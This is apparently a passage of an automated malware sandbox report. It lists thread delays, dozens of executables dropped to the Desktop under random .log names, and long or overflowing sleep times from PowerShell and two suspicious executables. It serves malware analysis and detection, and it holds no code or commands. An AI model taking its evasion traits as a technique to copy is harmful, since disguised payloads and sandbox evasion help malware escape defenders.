Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1649
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1462
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1957
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1703
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1660
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1979
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window / User API: threadDelayed 858
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window / User API: threadDelayed 4484
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window / User API: threadDelayed 3467
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2103
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2087
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2269
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1867
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2042
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2012
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2423
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fTGLCVSM.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\stDzyxQe.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yuQrGMvY.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uDZAyPvf.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PwjnMVKl.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gUHludjC.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fcdLmHlJ.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rreJQTki.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ttRrlCpd.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ylgZbdUT.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EhviVOkL.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aceLSxeO.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KIRpkYvx.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FNQYcsFE.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WyUWCOVc.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QyIevzpi.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hILtgrfA.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VoMNpBPa.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DhiqiJKM.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wjuqGuQY.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VWRNVcdg.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RGFoMnqm.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bmmUfKkQ.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nGlBWAAq.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IUzpLFaA.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ArFrORkS.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sBnSdgqk.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qDaBeGpk.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 6176 Thread sleep time: -193000s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599719s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599516s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599297s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -598469s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -597942s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99812s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99636s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99438s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99250s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -99070s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98929s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98782s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98657s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -98530s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595688s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595529s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595328s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8680 Thread sleep time: -595125s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe TID: 8572 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep count: 1649 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 Thread sleep count: 1712 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 Thread sleep count: 1558 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8384 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep count: 1462 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep count: 1551 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep count: 2008 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep count: 1957 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 1912 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 1703 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 Thread sleep count: 1660 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep count: 1970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 Thread sleep count: 1979 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8388 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8076 Thread sleep time: -858000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8416 Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -598984s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -598672s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -597906s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -597078s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -596641s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -596067s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -595375s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -595062s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9928 Thread sleep time: -3600000s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -594234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -593780s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -593234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -592891s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -592516s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -591859s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -591500s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -591156s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -590859s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -590172s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589953s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589750s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589516s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -589153s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588922s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588748s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588453s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588257s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588019s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -587594s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -587391s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -587190s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -586922s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -586562s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -586348s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -585984s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -585743s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -585031s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -584708s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -584125s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -583953s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -583500s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -583371s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -582766s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -582531s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -582396s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -581172s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -579531s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -579234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -579022s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -578594s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -578247s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -578062s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -577641s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -576484s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -576234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -576086s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575939s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575793s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575685s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575566s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575395s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575237s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575122s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -574993s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -574219s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -574040s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -573725s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -573437s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -573062s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572828s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572422s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572196s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572016s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -571797s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -571453s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -571222s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -570984s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -570812s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -570547s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -569516s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568964s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568687s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568394s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568178s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568036s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -567902s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -567680s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566844s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566699s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566420s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566281s >= -30000s
